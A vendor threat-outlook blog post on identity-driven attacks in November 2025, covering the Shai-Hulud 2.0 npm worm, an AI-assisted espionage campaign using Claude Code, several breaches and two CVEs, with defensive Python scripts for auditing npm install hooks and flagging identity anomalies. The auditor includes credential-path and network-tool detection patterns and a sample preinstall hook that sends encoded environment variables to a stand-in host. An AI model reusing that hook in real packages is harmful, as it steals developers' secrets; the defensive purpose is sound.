Identity attacks are evolving faster than defenders can adapt
Delinea Labs December 2025 Threat Outlook
The Delinea Labs research team has been digging into threat reports, monitoring identity-driven attacks, and analyzing how the landscape has shifted over the past month.
November 2025 made one thing abundantly clear: attackers no longer need to “break in” when they can just authenticate their way through the front door.
Identity shaped the entire threat landscape over the past month. Everything from supply chain malware to AI-assisted espionage depended on the ability to exploit trust relationships quickly and quietly.
Here’s what we can expect next based on the patterns we’ve tracked.
The big theme: Authentication without authorization
November revealed a shift in attacker behavior. Instead of bypassing authentication, intruders are using systems exactly as they were designed to work. Tokens, service accounts, SCIM provisioning flows, and SaaS integrations are becoming the easiest paths in.
Two incidents captured the scale of the change:
- Shai-Hulud 2.0 attacked the npm ecosystem by targeting developers rather than code. The worm collected CI tokens, cloud keys, and automation secrets through malicious preinstall scripts, then used those stolen credentials to sign into developer tools and services and publish itself into other packages the victim could write to.
- An AI-supported espionage campaign compressed the entire intrusion lifecycle down to hours. Anthropic identified an attacker using Claude Code to run recon, harvest credentials, escalate privileges, and pivot across environments at machine speed. AI didn’t just assist with the intrusion; it accelerated it.
These events demonstrate that identity has become the medium through which attackers operate, not the hurdle they need to clear.
What we’re seeing at Delinea Labs: Identity abuse is getting faster
Our own telemetry showed that identity misuse is picking up speed. AI is shortening every step of an intrusion, and identity is where attackers are gaining the most leverage.
Key observations from the past month:
- Misconfigured identity systems outpaced endpoint exploits as entry points
- Token theft is replacing password theft: a stolen token is an already-authenticated session, so it sidesteps MFA and the failed-login and password-reset signals defenders watch for
- Machine identities are driving lateral movement as attackers lean on unattended service accounts and stale secrets
- Ransomware operations now begin with identity compromise, with groups like Clop and Qilin abusing VPN credentials and unprotected admin accounts to establish a foothold
These trends suggest December will bring even more automated identity probing and session hijacking.
Major breaches and vulnerabilities
From developer-focused supply chain worms to AI-assisted espionage, attackers are exploiting tokens, stale service accounts, and misconfigurations to move faster and penetrate deeper than ever. The following breaches and vulnerabilities illustrate exactly how identity is being weaponized and why protecting both human and machine identities is now essential.
Shai-Hulud 2.0 – npm supply chain worm
- Malicious preinstall scripts exfiltrated environment variables, CI/CD tokens, and cloud keys, then used these credentials to propagate across other packages.
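The two Shai-Hulud 2.0 descriptions above come down to one mechanism: an install-time lifecycle hook that reads the environment and sends it somewhere. The following Python script is an added example (not Delinea's or npm's code) that audits package.json files for exactly that pattern. The indicator regexes, severity scoring, and both package.json samples are constructed for the demonstration; point `scan_node_modules()` at a real `node_modules` tree to audit a checkout.

```python
"""Audit npm packages for install-time lifecycle scripts that look like credential stealers.

Added example for illustration; the heuristics below are assumptions, not a published
detection signature. Runs offline on the constructed samples at the bottom.
"""
import json
import os
import re

# npm runs these hooks automatically during `npm install` unless ignore-scripts is set.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator classes for an install hook that may be harvesting or exfiltrating secrets.
# These patterns are chosen for this example; tune them for your environment.
INDICATORS = {
    "reads_env": re.compile(r"process\.env|printenv|\$[A-Z_]{3,}"),
    "network": re.compile(r"\bcurl\b|\bwget\b|https?://|require\(['\"]https?['\"]\)|fetch\("),
    "encoding": re.compile(r"base64|Buffer\.from|atob\(|btoa\("),
    "secret_paths": re.compile(r"\.npmrc|\.aws|\.ssh|\.git-credentials|\.docker/config"),
    "inline_eval": re.compile(r"node\s+-e\b|\beval\(|child_process"),
}


def lifecycle_hooks(pkg: dict) -> dict:
    """Return the install-time hooks declared in a parsed package.json."""
    scripts = pkg.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def script_indicators(script: str) -> list:
    """Names of the indicator classes that fire on one script command."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def audit_package(pkg: dict) -> list:
    """One finding per install hook, with the indicators it trips.

    Any install hook deserves a look; a hook that both reads the environment and
    talks to the network is the worm's pattern and is scored 'high'.
    """
    findings = []
    for hook, cmd in lifecycle_hooks(pkg).items():
        hits = script_indicators(cmd)
        if "reads_env" in hits and "network" in hits:
            severity = "high"
        elif hits:
            severity = "medium"
        else:
            severity = "info"
        findings.append({
            "package": pkg.get("name", "<unnamed>"),
            "version": pkg.get("version", "?"),
            "hook": hook,
            "command": cmd,
            "indicators": hits,
            "severity": severity,
        })
    return findings


def scan_node_modules(root: str) -> list:
    """Walk a node_modules tree (nested node_modules included) and audit every package.json."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except ValueError:
                continue  # fixture or broken manifest; not an installed package
        findings.extend(audit_package(pkg))
    return findings


# Constructed package.json contents for the demo; neither is a real package.
BENIGN_PKG = {
    "name": "native-addon-example",
    "version": "1.0.0",
    "scripts": {"install": "node-gyp rebuild", "test": "mocha"},
}
MALICIOUS_PKG = {
    "name": "trojanized-util-example",
    "version": "4.2.1",
    "scripts": {
        "preinstall": "node -e \"require('https').request({host:'exfil.example',method:'POST'})"
                      ".end(Buffer.from(JSON.stringify(process.env)).toString('base64'))\"",
        "test": "jest",
    },
}

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        results = scan_node_modules(sys.argv[1])
    else:
        results = audit_package(BENIGN_PKG) + audit_package(MALICIOUS_PKG)
    for f in results:
        print(f"[{f['severity']}] {f['package']}@{f['version']} {f['hook']}: "
              f"{', '.join(f['indicators']) or 'no indicators'}")
```

Run it as `python audit_hooks.py node_modules` after an install, or better, before one: set `ignore-scripts=true` in `.npmrc` (or use `npm ci --ignore-scripts`) so no hook runs at all, then rebuild the few native addons that genuinely need their install script by hand. CI runners should also scope npm and cloud tokens so that a hook that does run finds nothing worth stealing.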
Anthropic AI-assisted espionage campaign
- Autonomous AI performed reconnaissance, credential harvesting, privilege escalation, and lateral movement across financial, technology, and public sector targets.
EY – Azure SQL backup exposure
- A cloud-storage misconfiguration exposed 4 TB of data, including hashed credentials and authentication artifacts.
Habib Bank AG Zurich – Qilin data theft
- Attackers leveraged compromised privileged identities and service accounts to exfiltrate internal banking data.
Mixpanel – analytics token exposure
- A leaked project token allowed unauthorized access to analytics event data, illustrating that even limited tokens can enable identity-based attacks.
Identity vulnerabilities
- CVE-2025-47151 (Lasso SAML type confusion): crafted SAML responses can execute arbitrary code, potentially compromising entire federation chains
- CVE-2025-41115 (Grafana SCIM privilege escalation): provisioning flaws allowed attackers to impersonate admins and escalate privileges
What enterprises should focus on next
Based on November’s activity, security teams should focus on:
1. Enforce MFA and adaptive authentication
- Require MFA across all identity providers, privileged roles, admin workflows, and servers
- Remove legacy exceptions and enforce adaptive policies based on risk
2. Audit and harden identity configurations
- Review IdPs, SCIM connectors, SAML configurations, and cloud IAM roles
- Reduce misconfigurations, excessive permissions, and drift from least-privilege principles
3. Rotate secrets and reduce standing privilege
- Remove stale service accounts, rotate long-lived tokens, and enforce just-in-time access
- Limit local admin rights to reduce privilege escalation risks
4. Secure developer and automation workflows
- Vault CI/CD and automation credentials
- Remove secrets from local environments and require dual-approval or AI-assisted checks for sensitive operations
5. Monitor identity behavior continuously
- Detect anomalies in sessions, token use, and privileged account activity
- Track lateral movement, suspicious provisioning, and automation abuse
6. Harden identity infrastructure protections
- Patch SAML, SCIM, IAM, and federation platforms promptly
- Validate provisioning chains and enforce layered access controls
7. Prepare for AI-accelerated attacks
- Reduce attack surface and minimize exposed credentials
- Shorten detection and response cycles, assuming intrusions may operate at machine speed
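Item 5 above lists three signals worth alerting on: anomalous token use, privileged and service account activity, and suspicious provisioning. The Python below is an added example (not Delinea's code or product logic) that turns those three signals into rules run over a constructed identity event log. The event schema (`type`, `actor`, `token`, `src_ip`, `account`, `interactive`, `target`, `role`), the time windows, and the admin role names are all assumptions for the demo; map your IdP, SCIM, and cloud audit fields onto the same keys before using it.

```python
"""Rule-based identity detections: token reuse across IPs, interactive service-account
logins, and admin grants shortly after SCIM provisioning.

Added example for illustration. The schema, windows and sample events are constructed;
nothing here is a vendor signature.
"""
from datetime import datetime, timedelta

# Constructed events in a normalised schema (assumed, not any IdP's native format).
EVENTS = [
    {"ts": "2025-11-20T08:00:00Z", "type": "token_use", "actor": "alice", "token": "tkn-a1",
     "src_ip": "203.0.113.10", "account": "human"},
    {"ts": "2025-11-20T08:04:00Z", "type": "token_use", "actor": "alice", "token": "tkn-a1",
     "src_ip": "198.51.100.77", "account": "human"},
    {"ts": "2025-11-20T09:00:00Z", "type": "login", "actor": "svc-backup",
     "src_ip": "10.0.5.20", "account": "service", "interactive": True},
    {"ts": "2025-11-20T09:30:00Z", "type": "scim_provision", "actor": "scim-connector",
     "target": "bob.new", "src_ip": "10.0.1.2"},
    {"ts": "2025-11-20T09:32:00Z", "type": "role_grant", "actor": "scim-connector",
     "target": "bob.new", "role": "org_admin", "src_ip": "10.0.1.2"},
    {"ts": "2025-11-20T10:00:00Z", "type": "login", "actor": "svc-ci",
     "src_ip": "10.0.5.21", "account": "service", "interactive": False},
    {"ts": "2025-11-21T08:00:00Z", "type": "token_use", "actor": "carol", "token": "tkn-c9",
     "src_ip": "203.0.113.55", "account": "human"},
    {"ts": "2025-11-21T15:00:00Z", "type": "token_use", "actor": "carol", "token": "tkn-c9",
     "src_ip": "203.0.113.56", "account": "human"},
]

TOKEN_REUSE_WINDOW = timedelta(minutes=10)       # assumed tuning value
PROVISION_TO_ADMIN_WINDOW = timedelta(minutes=15)  # assumed tuning value
ADMIN_ROLES = {"org_admin", "global_admin", "owner"}  # assumed role names


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_token_reuse(events, window=TOKEN_REUSE_WINDOW):
    """Same token presented from two source IPs within `window`: candidate session hijack."""
    findings = []
    last_seen = {}  # token -> (timestamp, src_ip) of the previous use
    for ev in sorted(events, key=lambda e: e["ts"]):  # ISO-8601 strings sort chronologically
        if ev["type"] != "token_use":
            continue
        ts = parse_ts(ev["ts"])
        prev = last_seen.get(ev["token"])
        if prev and prev[1] != ev["src_ip"] and ts - prev[0] <= window:
            findings.append({"rule": "token_reuse_across_ips", "actor": ev["actor"],
                             "token": ev["token"], "ips": [prev[1], ev["src_ip"]]})
        last_seen[ev["token"]] = (ts, ev["src_ip"])
    return findings


def detect_interactive_service_logins(events):
    """Service accounts exist for automation; an interactive login means a human (or an attacker) holds the secret."""
    return [{"rule": "service_account_interactive_login", "actor": ev["actor"], "src_ip": ev["src_ip"]}
            for ev in events
            if ev["type"] == "login" and ev.get("account") == "service" and ev.get("interactive")]


def detect_rapid_admin_after_provision(events, window=PROVISION_TO_ADMIN_WINDOW):
    """A SCIM-created identity that receives an admin role within `window` of creation."""
    findings = []
    created = {}  # target -> provisioning timestamp
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "scim_provision":
            created[ev["target"]] = parse_ts(ev["ts"])
        elif ev["type"] == "role_grant" and ev.get("role") in ADMIN_ROLES:
            t0 = created.get(ev["target"])
            if t0 is not None:
                age = parse_ts(ev["ts"]) - t0
                if age <= window:
                    findings.append({"rule": "admin_grant_after_provisioning", "target": ev["target"],
                                     "role": ev["role"], "minutes_after_creation": age.total_seconds() / 60})
    return findings


def run_detections(events):
    """Run every rule and return the combined findings."""
    return (detect_token_reuse(events)
            + detect_interactive_service_logins(events)
            + detect_rapid_admin_after_provision(events))


if __name__ == "__main__":
    for finding in run_detections(EVENTS):
        print(finding)
```

On the sample data the rules fire once each: alice's token used from a second address four minutes later, svc-backup logging in interactively, and bob.new made org_admin two minutes after SCIM created the account. carol's token moving between addresses seven hours apart is left alone by the ten-minute window, which is the tuning decision to revisit once you know how your own users roam. Each finding carries the actor or target so the response playbook can revoke the session, rotate the service account, or suspend the provisioned identity without a second lookup.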
It’s clear that identity is now the frontline of every enterprise defense. Attackers are moving faster, targeting tokens, service accounts, and automation credentials. They’re also leveraging AI to accelerate attacks. Organizations that proactively secure, monitor and manage all aspects of human and machine identities will enter 2026 with a resilient foundation. Those who delay will continue to fall behind.
Find out how you can stay ahead of AI-assisted and supply-chain attacks with the Delinea Platform powered by Iris AI while protecting every human and machine identity across the enterprise.